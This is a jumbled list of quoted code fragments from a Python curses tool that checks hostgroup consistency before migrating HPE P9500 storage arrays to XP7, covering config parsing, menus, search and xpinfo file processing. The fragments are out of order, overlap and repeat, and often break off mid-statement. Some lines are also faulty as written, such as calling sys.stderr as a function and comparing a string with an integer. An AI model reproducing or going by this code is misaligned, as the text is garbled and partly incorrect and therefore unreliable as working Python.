"\"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f for f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f))",
"self.position = len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate :: position = {}, n = {}\".format(self.position,n",
"enumerate(self.filtered_items): if index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL #",
"stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win ### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0)",
"self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.consistent)",
"not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict = {} for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] =",
"\"{}: \".format(self.text) if line >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate()",
"curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window = window",
"during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added to consistent hostgroup list during consistency",
"= window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text =",
"self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6) self.slice_start = 0 self.slice_end = self.slice_start",
"= {} hostgroup_dict = {} for serial_nbr in serial_nbr_set: ldev_dict[serial_nbr] = set() ###",
"logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" *",
"panel.update_panels() self.text = text self.reply = \"\" self.update_object = upd_obj def display(self): self.panel.top()",
"view on the items which fits in the window ### self.slice_start = 0",
"hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key",
"+ self.slice_len elif n > 0: if self.slice_end - self.position < 2 and",
"self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width =",
"self.window.addstr(1+index,2,line,mode) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position == len(self.items) -",
"while True: self.window.refresh() curses.doupdate() for index,item in enumerate(self.items): if index == self.position: mode",
"self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx()",
"### define title_win ### title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO XP7 MIGRATION PRE-CHECK\")",
")) def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() for",
"response ### self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate() class Selection(object): def __init__(self,window,title,stdscr): self.window",
"curses.A_NORMAL # line = \"{}: {}\".format(index,item[0]) line = \"{}\".format(item[0]) if len(line) >= self.width:",
"show the list of xpinfo files ### for index,item in enumerate(self.xpinfo_file_list): if index",
"self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report)",
"..\\n\") sys.exit(1) ### define title_win ### title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO XP7",
"consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win",
"= window self.heigth,self.width = self.window.getmaxyx() self.selection = selection self.hostgroup_summary = [] self.window.keypad(1) self.panel",
"key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN:",
"n > 0: if self.slice_end - self.position < 2 and self.slice_end < len(self.filtered_items)",
"item = item[:self.width-1] if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch()",
"= line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.consistent) current_set.add(item) self.consistent",
"hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP:",
"self.position == len(self.xpinfo_file_list) - 1: break else: logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set =",
"key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window",
"elif self.position >= len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list) - 1 if n < 0:",
"not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display))",
"self.selection = [] def display(self): self.window.clear() line = \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for",
"logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ### now we know what to display ### self.slice_start",
"hostgroup_dict: hostgroup_dict[box_name] = set() for ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name)",
"= cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir not defined, exiting..\\n\") sys.exit(1) try: collect_dir =",
"by name ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for box_name in",
"self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif",
"self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.xpinfo_dir = xpinfo_dir self.selection",
"for name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value) for name,value in cfg.items(\"instance\"): instance_dict[name.upper()] =",
"self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx() ### fill the list",
"def display(self): self.window.clear() line = \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection]))",
"the new search criteria \"\"\" if self.search.get() != \"\": logger.debug(\"Select_Menu.update :: update items",
"{}\".format(index,item[0]) line = \"{}\".format(item[0]) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key",
"elif n > 0: if self.slice_end - self.position < 2 and self.slice_end <",
"list(sorted(current_set)) self.display() def clear(self): del self.selection[:] self.display() def get(self): return self.selection class Search(object):",
"= csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader: if len(row) > 8: hostname = row[0]",
"sys.stderr(err_msg + \"\\n\") sys.exit(1) box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created for box {}",
"the list to display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): if",
"panel.update_panels() curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list",
":: slide slice up to {}-{}\".format(self.slice_start,self.slice_end )) elif n > 0: if self.slice_end",
"in ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups to the",
"= [] def navigate(self,n): if n < 0: if self.slice_start >= 1: self.slice_start",
"= selection self.hostgroup_summary = [] self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list =",
"search_str self.display() def clear(self): self.search_str = \"\" self.display() def get(self): return self.search_str class",
"line[:self.width-1] ### only add lines in the slice ### # logger.debug(\"SelectMenu.display :: about",
"Consistency check update 2.1 Add xpinfo file processing CONFIG : xpmig.ini LOG :",
"cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in",
"{}\".format(index,item) line = \"{}\".format(item) if len(line) >= self.width: line = line[:self.width-1] ### only",
"- 1: self.slice_end = len(self.xpinfo_file_list) - 1 self.slice_start = self.slice_end - self.slice_len def",
"# logger.debug(\"SelectMenu.display :: index in slice {} - {}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key",
"<B> BACK\",curses.A_BOLD) ### define menu_win ### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items =",
"logger.debug(\"Select_Menu.navigate :: position = {}, n = {}\".format(self.position,n )) ### adjust slice ###",
"x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update :: update items to match search",
"elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif key ==",
"file dir not defined, exiting..\\n\") sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file",
"defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir not defined,",
"self.title = title self.search_str = \"\" def display(self): self.window.clear() line = \"{}: {}\".format(self.title,self.search_str)",
"check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else:",
"cfg.read(configfile) for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in config",
"hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {}",
"min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start + self.slice_len while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item",
"key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif key == curses.KEY_PPAGE:",
"hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in",
"self.slice_len self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.selection = selection",
"hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item =",
"self.panel.hide() panel.update_panels() self.text = text self.reply = \"\" self.update_object = upd_obj def display(self):",
"panel.new_panel(self.window) self.panel.hide() panel.update_panels() def display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out to file",
"start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict = {} for",
"file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added to ldev_dict, now",
"for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in site_dict:",
"[] self.consistent = consistent def navigate(self,n): if n < 0: if self.slice_start >=",
"= ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup consistency menu ### hostgroup_consistency =",
"on status #################################################################################################### \"\"\" import curses from curses import panel import re import",
"selection.display() ### define consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display()",
"True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.display_list): if len(item) >= self.width: item",
"### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show hostgroup summary menu ###",
"logger.debug(\"Select_Menu.navigate :: slide slice up to {}-{}\".format(self.slice_start,self.slice_end )) elif n > 0: if",
"summary\",hostgroup_summary.display)) ### show hostgroup consistency menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency",
"key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items) - 1: break else: # self.items",
"selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif",
"box_name in hostgroup_dict: hostgroup_dict[box_name] = set() for ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name in",
"<= self.slice_end: # logger.debug(\"SelectMenu.display :: index in slice {} - {}, executing addstr\".format(self.slice_start,self.slice_end))",
"select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select",
"instance_nbr = instance_dict[box_name] else: err_msg = \"No HORCM instance nbr defined for box",
"in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6)",
"in sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list:",
"- 1: ### slide slice down ### self.slice_end += n if self.slice_end >",
"box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in site_dict: site",
"### if curses.COLS < 20 or curses.LINES < 20: sys.stderr.write(\"Window not large enough,",
"slice down ### self.slice_end += n if self.slice_end > len(self.filtered_items) - 1: self.slice_end",
">= self.width: item = item[:self.width-1] if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key",
"self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice down to {}-{}\".format(self.slice_start,self.slice_end )) def display(self):",
"elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items) - 1: break else: #",
"for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups to the selection ###",
"the window ### self.slice_start = 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start +",
"### add found hostgroups to the selection ### for box_name in hostgroup_dict: for",
"== curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window =",
"csv import string import xp7 #################################################################################################### ### VARIABLES #################################################################################################### linelen = 100 boxpair_dict",
"re import logging import logging.handlers import copy from ConfigParser import ConfigParser import sys",
"for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key == curses.KEY_UP: self.navigate(-1) elif key ==",
"= Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win ### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh()",
"######################### ### instantiate boxes ### ######################### for box_name in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name])",
":: index in slice {} - {}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch()",
"self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key == curses.KEY_UP:",
"self.search_str = \"\" def display(self): self.window.clear() line = \"{}: {}\".format(self.title,self.search_str) if len(line) >=",
"1.2 Add search term criteria 1.3 Add config file 2.0 Consistency check update",
"self.window.getstr() ### after we received the response ### self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels() curses.noecho()",
"set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict = {} for serial_nbr in serial_nbr_set: ldev_dict[serial_nbr] =",
"if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added to ldev_dict, now at",
"def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item",
"stdscr.getkey() #################### ### parse config ### #################### configfile = \"xpmig.ini\" cfg = ConfigParser()",
"self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN #################################################################################################### def main(stdscr): ### clear",
"import xp7 #################################################################################################### ### VARIABLES #################################################################################################### linelen = 100 boxpair_dict = {} serialnbr_dict",
")) ### adjust slice ### if n < 0: if self.position - self.slice_start",
"- {}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break",
"logger.addHandler(fh) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" * linelen) logger.info(\"Configuration settings :\")",
"get(self): return self.selection class Search(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx()",
"1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width =",
"{}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created",
"to match the new search criteria \"\"\" if self.search.get() != \"\": logger.debug(\"Select_Menu.update ::",
"display ### self.slice_start = 0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start + self.slice_len",
"self.panel.show() self.window.clear() line = \"{}: \".format(self.text) if line >= self.width: line = line[:self.width-1]",
"n if self.position < 0: self.position = 0 elif self.position >= len(self.filtered_items): self.position",
"< len(self.filtered_items) - 1: ### slide slice down ### self.slice_end += n if",
"> len(self.xpinfo_file_list) - 1: self.slice_end = len(self.xpinfo_file_list) - 1 self.slice_start = self.slice_end -",
"n < 0: if self.slice_start >= 1: self.slice_start += n if self.slice_start <",
"curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent = consistent self.map_dir =",
"\"{}: {}\".format(self.title,self.search_str) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate()",
"self.slice_end += n if self.slice_end > len(self.filtered_items) - 1: self.slice_end = len(self.filtered_items) -",
"- 1 if n < 0: if self.position - self.slice_start < 2 and",
"sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir not defined, exiting..\\n\") sys.exit(1)",
"ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup consistency menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr)",
"linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" * linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict)",
"logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ### instantiate boxes ### ######################### for box_name in",
"consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name))",
"= cfg.getint(\"log\",\"level\") except: log_level = 30 try: log_size = cfg.getint(\"log\",\"maxsize\") except: log_size =",
"self.width: item = item[:self.width-1] if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key =",
"index,item in enumerate(self.xpinfo_file_list): if index == self.position: mode = curses.A_STANDOUT else: mode =",
"1.1 Curses menu structure added 1.2 Add search term criteria 1.3 Add config",
"self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx()",
"\"{}: {}\".format(index,item[0]) line = \"{}\".format(item[0]) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode)",
"LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N,",
"sys.exit(1) if box_name in serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else: err_msg = \"No serial",
"+= n if self.position < 0: self.position = 0 elif self.position >= len(self.filtered_items):",
"= cfg.getint(\"log\",\"maxversions\") except: log_versions = 5 try: log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file",
"<= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break",
"display(self): self.window.clear() line = \"{}: {}\".format(self.title,self.search_str) if len(line) >= self.width: line = line[:self.width-1]",
"curses.doupdate() for index,item in enumerate(self.items): if index == self.position: mode = curses.A_STANDOUT else:",
"received the response ### self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate() class Selection(object): def",
"select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list =",
"= row[1] ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8]) logger.debug(\"XPINFO: got S/N {} LDEV",
"stdscr.clear() ### check window heigth and width ### if curses.COLS < 20 or",
"#################################################################################################### ### VARIABLES #################################################################################################### linelen = 100 boxpair_dict = {} serialnbr_dict = {}",
"self.items = items self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position += n if self.position < 0:",
"self.position >= len(self.items): self.position = len(self.items) - 1 def display(self): self.panel.top() self.panel.show() self.window.clear()",
"= self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice down to {}-{}\".format(self.slice_start,self.slice_end )) def",
"boxes ### ######################### for box_name in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in",
"\"\\n\") sys.exit(1) box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created for box {} :\".format(box_name)) logger.info(box_dict[box_name])",
"hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups to the selection ### for",
"= 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start + self.slice_len self.window.keypad(1) self.panel =",
"\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line)",
"for f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth",
"curses.doupdate() def set(self,search_str): self.search_str = search_str self.display() def clear(self): self.search_str = \"\" self.display()",
"if self.slice_end - self.position < 2 and self.slice_end < len(self.xpinfo_file_list) - 1: ###",
"self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.items = items self.items.append((\"exit\",\"exit\")) def",
"display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx() ### fill the list to display",
">= 1: self.slice_start += n if self.slice_start < 0: self.slice_start = 0 self.slice_end",
"sys.exit(1) serial_to_name_dict = {} for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name ##################### ###",
"== len(self.items) - 1: break else: self.items[self.position][1]() elif key == curses.KEY_UP: self.navigate(-1) elif",
"= set() for ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add",
"= stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO XP7 MIGRATION PRE-CHECK\") title_win.border() ### define search_win ###",
"### self.slice_start += n if self.slice_start < 0: self.slice_start = 0 self.slice_end =",
"### define search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS matching this",
"menu structure added 1.2 Add search term criteria 1.3 Add config file 2.0",
"self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position ==",
"in cfg.items(\"site\"): site_dict[name.upper()] = value for name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try:",
"serial_nbr = serialnbr_dict[box_name] else: err_msg = \"No serial nbr defined for box {},",
"1: sel_item = hba_wwn.nickname.split(\"_\")[0] else: sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in select_item_dict:",
"slice down to {}-{}\".format(self.slice_start,self.slice_end )) def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True:",
"= Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select hostgroups by host (hba_wwn) ### select_item_dict",
"self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str = search_str self.display() def clear(self): self.search_str = \"\"",
"self.window.clear() self.heigth,self.width = self.window.getmaxyx() ### fill the list to display ### self.display_list =",
"list to display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name):",
"= stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win ### key_win =",
"or PAGE-UP> SCROLL UP <ARROW-DOWN or PAGE-DOWN> SCROLL DOWN <B> BACK\",curses.A_BOLD) ### define",
"= {} box_dict = {} #################################################################################################### ### FUNCTIONS #################################################################################################### #################################################################################################### ### CLASSES ####################################################################################################",
"logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ### instantiate",
"key in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items) -",
"stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS matching this SEARCH expression\",stdscr) search.display() ### define selection_win",
"slide slice up ### self.slice_start += n if self.slice_start < 0: self.slice_start =",
"cfg.getint(\"log\",\"maxversions\") except: log_versions = 5 try: log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir",
"= \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent])) if len(line) >= self.width: line =",
"0 def navigate(self,n): self.position += n if self.position < 0: self.position = 0",
"SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear)) ### select hostgroups by box ### for boxpair_name",
"mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item) line = \"{}\".format(item) if len(line)",
"len(self.filtered_items): self.position = len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate :: position = {}, n =",
"= set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict = {} for serial_nbr in serial_nbr_set: ldev_dict[serial_nbr]",
"in self.selection])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate()",
"self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif key == curses.KEY_PPAGE: self.navigate(-10) elif key",
